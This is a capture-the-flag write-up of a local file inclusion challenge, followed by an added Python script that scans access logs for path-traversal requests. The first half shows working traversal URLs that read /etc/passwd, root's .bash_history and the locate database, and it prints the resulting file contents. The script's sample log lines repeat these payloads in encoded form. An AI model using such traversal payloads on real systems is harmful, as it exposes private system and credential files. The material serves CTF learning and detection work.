State of the art
A nice cyber-hacker-haxxor-website-of-death containing a magical robots.txt file:

    User-agent: *
    Disallow: /notinterestingfile.php

Local file include
Let’s try something:
https://web075-sysia.challenge-ecw.fr/notinterestingfile.php?page=../../../../../../../etc/passwd

    root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false

Ok, it works: there is only one user with /bin/bash. I can’t display any other web page via LFI, so I think I’ll try to display the .bash_history:
https://web075-sysia.challenge-ecw.fr/notinterestingfile.php?page=../../../../../../../root/.bash_history
It worked (I will just put a snippet below because it’s veeeeery long):

    docker exec -it CTFd_NDH_2018 /bin/sh
    ll
    mkdir ndh
    cd ndh/
    locate flag.txt
    updatedb
    locate flag.txt
    ll
    nano Dockerfile
    nano proxy.py
    docker build . -n CTFd_ndh

Flag location
Ok, he did an updatedb, so the location of flag.txt is stored in the locate database. The default path is: /var/lib/mlocate/mlocate.db
https://web075-sysia.challenge-ecw.fr/notinterestingfile.php?page=../../../../../../../var/lib/mlocate/mlocate.db
Flag
https://web075-sysia.challenge-ecw.fr/notinterestingfile.php?page=../../../../../../../var/www/ECW/solution/web/lfi/flag.txt
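
A defender-side check for the requests shown in this write-up, as an added example that is not part of the original post: it parses access-log lines, percent-decodes each query parameter until the value is stable, and reports values that resolve outside the document root. The WEBROOT value, the function names and the log lines (addresses, dates, sizes, the encoded forms and the benign requests) are assumptions constructed for the illustration.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

WEBROOT = "/var/www/html"  # assumed document root, not stated in the write-up
SENSITIVE = ("/etc/passwd", ".bash_history", "mlocate.db")  # files requested above
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) ')

# Constructed access-log lines: addresses, dates and sizes are made up; the encoded
# forms and the two benign requests are added to exercise the normalisation.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /notinterestingfile.php?page=../../../../../../../etc/passwd HTTP/1.1" 200 1204
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /notinterestingfile.php?page=..%2F..%2F..%2Froot%2F.bash_history HTTP/1.1" 200 8841
203.0.113.7 - - [01/Jan/2024:10:00:30 +0000] "GET /notinterestingfile.php?page=%252e%252e/%252e%252e/%252e%252e/var/lib/mlocate/mlocate.db HTTP/1.1" 200 90112
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /notinterestingfile.php?page=contact HTTP/1.1" 200 512
198.51.100.4 - - [01/Jan/2024:10:01:05 +0000] "GET /index.php?q=a..b HTTP/1.1" 200 300
"""

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so values encoded more than once are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_findings(log_text):
    """Return one finding per query parameter whose value resolves outside WEBROOT."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            value = fully_decode(raw).replace("\\", "/")
            resolved = posixpath.normpath(posixpath.join(WEBROOT, value))
            if resolved == WEBROOT or resolved.startswith(WEBROOT + "/"):
                continue  # value stays inside the document root
            findings.append({
                "client": client, "param": name, "resolved": resolved,
                "served": status == "200", "sensitive": any(s in resolved for s in SENSITIVE),
            })
    return findings

if __name__ == "__main__":
    for finding in traversal_findings(SAMPLE_LOG):
        print(finding)
```

A finding with `served` set means the server answered 200 to a path outside the document root, which is the case to triage first.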